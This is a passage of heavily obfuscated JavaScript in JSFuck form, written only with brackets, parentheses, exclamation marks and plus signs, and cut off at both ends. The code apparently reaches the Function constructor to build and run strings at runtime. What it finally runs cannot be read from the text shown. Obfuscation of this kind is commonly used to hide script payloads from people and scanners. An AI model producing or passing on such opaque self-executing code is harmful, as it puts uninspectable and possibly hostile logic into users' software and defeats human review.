]+!![]+(+[])+![]+!![]+(+!![])+![]+(!![]+!![])+!![]+![]+(+!![])+!![]+!![]+![]+!![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(!![]+!![])+![]+(+!![])+![]+(+!![])+(+!![])+(!![]+!![])+![]+(+!![])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+![]+!![]+(+[])+![]+(+!![])+(+!![])+(+[])+![]+!![]+![]+(!![]+!![])+!![]+!![]+![]+(+!![])+!![]+(!![]+!![])+![]+!![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(!![]+!![])+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+![]+(+!![])+(+!![])+!![]+![]+(+!![])+!![]+![]+(+!![])+(+!![])+![]+(+!![])+(+!![])+![]+(+!![])+!![]+!![]+![]+!![]+(!![]+!![])+![]+(!![]+!![])+(!![]+!![])+(+!![])+![]+(+!![])+(!![]+!![])+!![]+![]+!![]+(+!![])+(+!![])+![]+!![]+(+!![])+(+!![])+![]+!![]+(!![]+!![])+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+![]+!![]+(!![]+!![])+!![]+![]+!![]+!![]+![]+(+!![])+!![]+![]+!![]+(+[])+![]+(+!![])+!![]+!![]+![]+!![]+(!![]+!![])+![]+!![]+(!![]+!![])+![]+!![]+(+!![])+!![]+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+(+!![])+(+!![])+![]+![]+!![]+![]+(+!![])+![]+!![]+![]+![]+(+!![])+(!![]+!![])+!![]+![]+!![]+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+!![])+![]+![]+(+!![])+(+[])+![]+!![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+!![]+(+[])+![]+!![]+![]+(+!![])+!![]+![]+(+!![])+(+!![])+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+!![]+(+[])+![]+!![]+![]+(+!![])+(+!![])+!![]+![]+(+!![])+(+!![])+(+!![])+![]+(!![]+!![])+![]+!![]+![]+!![]+!![]+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+(+!![])+!![]+!![]+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+!![]+(+!![])+!![]+![]+!![]+!![]+(!![]+!![])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+(!![]+!![])+(+!![])+![]+!![]+(+!![])+![]+!![]+!![]+(+[])+![]+(+!![])+![]+!![]+(+!![])+![]+![]+(+!![])+(+[])+![]+(+!![])+(!![]+!![])+![]+(+!![])+(+[])+(+!![])+![]+!![]+!![]+!![]+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+[])+![]+![]+!![]+(+[])+(+!![])+![]+(+!![])+![]+!![]+(+!![])+![]+![]+(+!![])+(+[])+![]+!![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+![]+(!![]+!![])+![]+(!![]+!![])+!![]+(!![]+!![])+![]+!![]+!![]+![]+!![]+(+[])+(+[])+![]+![]+(+!![])+(!![]+!![])+(+[])+![]+(+!![])+(+!![])+!![]+![]+(+!![])+(!![]+!![])+(+[])+![]+(+!![])+(+[])+!![]+![]+![]+!![]+!![]+(+[])+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(!![]+!![])+![]+!![]+!![]+!![]+![]+(+!![])+(+[])+(+!![])+![]+!![]+!![]+!![]+![]+(+!![])+!![]+!![]+![]+(+!![])+(+[])+(+[])+(+[])+![]+![]+(!![]+!![])+!![]+![]+(!![]+!![])+(+!![])+!![]+![]+(+!![])+![]+(+!![])+!![]+![]+(!![]+!![])+(+!![])+![]+!![]+(+!![])+!![]+![]+!![]+!![]+(!![]+!![])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+(!![]+!![])+(+!![])+![]+!![]+(+!![])+![]+!![]+!![]+(+[])+![]+(+!![])+![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+!![]+![]+!![]+![]+![]+!![]+(+[])+(+[])+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+!![])+![]+![]+(+!![])+(+[])+![]+(+!![])+(!![]+!![])+![]+(+!![])+(+[])+(+!![])+![]+!![]+!![]+!![]+![]+(!![]+!![])+![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+!![]+![]+!![]+![]+(+!![])+!![]+!![]+![]+!![]+![]+![]+(+!![])+(!![]+!![])+!![]+![]+!![]+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+!![]+(+!![])+!![]+![]+!![]+!![]+(!![]+!![])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+(!![]+!![])+(+!![])+![]+!![]+(+!![])+![]+!![]+!![]+(+[])+![]+(+!![])+![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+!![]+![]+!![]+![]+![]+!![]+(+[])+(+[])+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+(+!![])+(+[])+(+!![])+![]+!![]+![]+!![]+!![]+![]+!![]+(+!![])+![]+(+!![])+!![]+!![]+![]+(!![]+!![])+!![]+(+[])+![]+!![]+![]+!![]+!![]+(+[])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+(+!![])+(+!![])+(+[])+![]+(!![]+!![])+![]+(+!![])+(+!![])+!![]+![]+!![]+!![]+(+[])+![]+!![]+!![]+![]+!![]+(+[])+!![]+![]+(+!![])+(!![]+!![])+![]+(!![]+!![])+!![]+!![]+![]+!![]+(+!![])+![]+!![]+!![]+(+[])+![]+(+!![])+(!![]+!![])+![]+!![]+!![]+![]+!![]+(+[])+(+[])+![]+![]+(!![]+!![])+![]+!![]+(+!![])+![]+(+!![])+(+[])+!![]+![]+(+!![])+(+[])+!![]+![]+(+!![])+(+!![])+![]+(!![]+!![])+!![]+![]+(+!![])+!![]+!![]+![]+!![]+(+[])+![]+(+!![])+!![]+(+[])+![]+(+!![])+(+!![])+![]+(+!![])+(+!![])+![]+(!![]+!![])+(+!![])+!![]+![]+(+!![])+![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+!![]+![]+!![]+![]+![]+!![]+(+[])+(+[])+![]+(+!![])+(+[])+(+[])+![]+(!![]+!![])+!![]+![]+!![]+![]+![]+(+!![])+(+[])+![]+!![]+(+!![])+!![]+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(+[])+![]+!![]+(+!![])+(+[])+![]+!![]+(+[])+(+!![])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+!![]+(+[])+(+[])+![]+!![]+!![]+![]+!![]+(+[])+(+!![])+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(+!![])+![]+!![]+!![]+(+!![])+![]+(+!![])+![]+!![]+(+[])+(+!![])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+!![]+(+[])+(+[])+![]+!![]+!![]+![]+!![]+(+[])+(+!![])+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(!![]+!![])+![]+(+!![])+(+[])+!![]+([![]]+!![]+!![]+(+[])+![]+!![]+!![]+![]+!![]+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+!![]+!![]+![]+(+!![])+(+!![])+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+!![]+(!![]+!![])+![]+(!![]+!![])+!![]+(+!![])+![]+(!![]+!![])+!![]+(+!![])+![]+!![]+(!![]+!![])+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+!![]+(+[])+(+!![])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+!![]+(+[])+(+[])+![]+!![]+!![]+![]+!![]+(+[])+(+!![])+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(!![]+!![])+![]+(!![]+!![])+!![]+!![]+![]+!![]+!![]+![]+(+!![])+(+[])+![]+!![]+![]+!![]+(+[])+![]+!![]+(+!![])+![]+!![]+(+[])+!![]+![]+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+!![]+(!![]+!![])+![]+!![]+(+!![])+(!![]+!![])+![]+!![]+(!![]+!![])+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+!![]+(+[])+(+!![])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+!![]+(+[])+(+[])+![]+!![]+!![]+![]+!![]+(+[])+(+!![])+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(!![]+!![])+![]+(+!![])+(+[])+!![]+![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+!![]+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+!![]+(+[])+(+!![])+![]+(+!![])+!![]+![]+!![]+(+[])+![]+!![]+(+[])+(+[])+![]+!![]+!![]+![]+!![]+(+[])+(+!![])+![]+(!![]+!![])+![]+(+!![])+(+!![])+![]+!![]+!![]+![]+!![]+!![]+!![]+![]+!![]+(+!![])+![]+!![]+![]+(+!![])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+(!![]+!![])+![]+(+!![])+(+[])+!![]+![]+!![]+(+!![])+![]+!![]+![]+(!![]+!![])+!![]+!![]+![]+!![]+(+[])+![]+!![]+(+!![])+![]+!![]+(+[])+!![]+![]+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+!![]+(!![]+!![])+![]+!![]+(!![]+!![])+(+!![])+![]+(+!![])+!![]+![]+!![]+![]+![]+!![]+(+[])+!![]+![]+!![]+!![]+(+!![])+![]+!![]+(!![]+!![])+![]+(+!![])+![]+(+!![])+!![]+(+!![])+![]+(+!![])+![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+![]+!![]+(+[])+(+[])+![]+![]+(+!![])+(!![]+!![])+(!![]+!![])+![]+(!![]+!![])+(!![]+!![])+(+[])+![]+(!![]+!![])+(!![]+!![])+!![]+![]+(+!![])+(!![]+!![])+![]+!![]+!![]+![]+!![]+(+[])+!![]+![]+(+!![])+(+[])+!![]+![]+!![]+!![]+![]+!![]+(+[])+![]+![]+!![]+(+[])+![]+!![]+![]+(+!![])+!![]+!![]+![]+![]+!![]+(+[])+![]+!![]+!![]+!![]+![]+!![]+!![]+(+[])+![]+(!![]+!![])+!![]+![]+(+!![])+(+[])+!![]+![]+!![]+![]+![]+!![]+(+[])+(+[])+![]+!![]+(+!![])+!![]+![]+(!![]+!![])+(+[])+![]+(!![]+!![])+(!![]+!![])+(!![]+!![])))[(![]+[])[!![]+!![]+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()([][[]]))[+!![]+[+[]]]+(![]+[])[!![]+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[+[]]](!![])[([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([![]]+[][[]])[+!![]+[+[]]]+([][[]]+[])[+!![]]](!![]+!![]+!![])[(![]+[])[!![]+!![]+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()([][[]]))[+!![]+[+[]]]+(![]+[])[!![]+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[+[]]](![])[(+(!![]+!![]+[+[]]+(+!![])+(!![]+!![])+(!![]+!![]+!![]+!![]+!![])))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([]+[])[([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]][([][[]]+[])[+!![]]+(![]+[])[+!![]]+([]+(+[])[([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]])[+!![]+[+!![]]]+(!![]+[])[!![]+!![]+!![]]]](!![]+!![]+!![]+[+[]])]([][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+[][[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]()[+!![]+[+!![]]]+([]+[])[([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]+([![]]+[][[]])[+!![]+[+[]]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()[!![]+!![]]+(![]+[])[+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]()[+!![]+[+!![]]]+([]+[])[([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]+([![]]+[][[]])[+!![]+[+[]]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]()[!![]+!![]]+[][[]]+([[!![]][+!!++(+[]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()([][[]]))[+!![]+[+[]]]+(![]+[])[+!![]]+(!![]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(+(+!![]+(!![]+[])[!![]+!![]+!![]]+(+!![])+(+[])+(+[])+(+[]))+[])[+[]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+(+(+!![]+(!![]+[])[!![]+!![]+!![]]+(+!![])+(+[])+(+[]))+[])[!![]+!![]]+[][(![]+[])[+[]]+(![]+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]+(![]+[])[!![]+!![]]]((![]+[])[+[]]+(!![]+!![]+!![]+!![]))+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[!![]+!![]]]+([[!![]][+!!++(+[]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+[+[]]]]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]+[!![]+!![]]])()([][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(![]+[])[!![]+!![]+!![]]+(+(+!![]+[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+!![])+(+[]))+[])[+!![]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]+(+(+!![]+[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+!![])+(+[]))+[])[+!![]]+(![]+[])[+[]]+(!![]+[])[+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([]+(+[])[([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]])[+!![]+[+!![]]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+(![]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]])()(+[]+[+[]]+(+[![]])+![])[+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(![]+[])[!![]+!![]+!![]]+([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+!![]])())[+!![]+[+!![]]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([![]]+[][[]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+(+!![]+[+[]]+(+!![])+![]+(!![]+!![]+!![])+(!![]+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+!![])+(!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+![]+(+!![])+(+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![])+![]+(+!![])+(!![]+!![])+(+!![])+![]+(+!![])+(+!![])+(+[])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![])+(!![]+!![]+!![]+!![])+![]+(+!![])+(